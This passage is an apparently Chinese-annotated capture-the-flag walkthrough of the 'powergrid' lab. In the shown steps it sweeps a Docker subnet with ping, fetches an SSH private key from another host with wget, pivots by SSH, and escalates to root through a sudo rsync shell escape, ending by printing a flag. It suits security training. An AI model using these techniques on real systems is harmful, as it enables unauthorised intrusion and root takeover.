1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:e5:0a:a8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.150/24 brd 10.10.10.255 scope global dynamic eth0
       valid_lft 79995sec preferred_lft 79995sec
    inet6 fe80::20c:29ff:fee5:aa8/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:f5:81:85:71 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:f5ff:fe81:8571/64 scope link 
       valid_lft forever preferred_lft forever
5: veth11f51b9@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 22:ac:f7:3e:d5:da brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::20ac:f7ff:fe3e:d5da/64 scope link 
       valid_lft forever preferred_lft forever
You have mail in /var/mail/p48

探測172.17.0.0/24網段

for k in $( seq 1 255);do ping -c 1 172.17.0.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
p48@powergrid:~$ for k in $( seq 1 255);do ping -c 1 172.17.0.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
<7.0.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
172.17.0.1
172.17.0.2

探測出了這個ip存活,嘗試ssh

p48@powergrid:/tmp$ wget http://10.10.10.156/id_rsa
wget http://10.10.10.156/id_rsa
--2025-11-07 15:22:50--  http://10.10.10.156/id_rsa
Connecting to 10.10.10.156:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3382 (3.3K)
Saving to: ‘id_rsa’

id_rsa                0%[                  id_rsa              100%[===================>]   3.30K  --.-KB/s    in 0.001s  

2025-11-07 15:22:50 (2.51 MB/s) - ‘id_rsa’ saved [3382/3382]

p48@powergrid:/tmp$ chmod 600 id_rsa
chmod 600 id_rsa
p48@powergrid:/tmp$ ssh p48@172.17.0.2 -i id_rsa
ssh p48@172.17.0.2 -i id_rsa
Linux ef117d7a978f 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 20 00:22:30 2020 from 172.17.0.1
p48@ef117d7a978f:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

ssh登錄成功

p48@ef117d7a978f:~$ sudo -l
sudo -l
Matching Defaults entries for p48 on ef117d7a978f:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User p48 may run the following commands on ef117d7a978f:
    (root) NOPASSWD: /usr/bin/rsync

gtfobins查找:

p48@ef117d7a978f:~$ sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
# id 
id 
uid=0(root) gid=0(root) groups=0(root)
# ls  
ls
flag2.txt
# cat flag2.txt
cat flag2.txt
047ddcd1f33dfb7d80da3ce04e89df73

Well done for getting flag 2. It looks like this user is fairly unprivileged.
網絡安全
點贊

Add a new 評論

Some HTML is okay.